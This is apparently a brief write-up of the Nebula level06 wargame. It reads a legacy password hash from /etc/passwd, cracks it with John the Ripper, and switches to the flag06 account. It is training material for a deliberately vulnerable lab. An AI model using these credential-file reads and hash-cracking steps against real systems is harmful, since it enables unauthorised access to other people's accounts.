Level: https://exploit-exercises.com/nebula/level06/

The flag06 account credentials came from a legacy unix system.

To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

cat /etc/passwd | grep flag06

Gives us flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

Now fire up Kali because we need to use John the Ripper

echo "flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh" > crack
john --show crack

flag06:hello:993:993::/home/flag06:/bin/sh

Our password is hello

Back on the Nebula system:

su flag06
Password: hello
getflag

You have successfully executed getflag on a target account.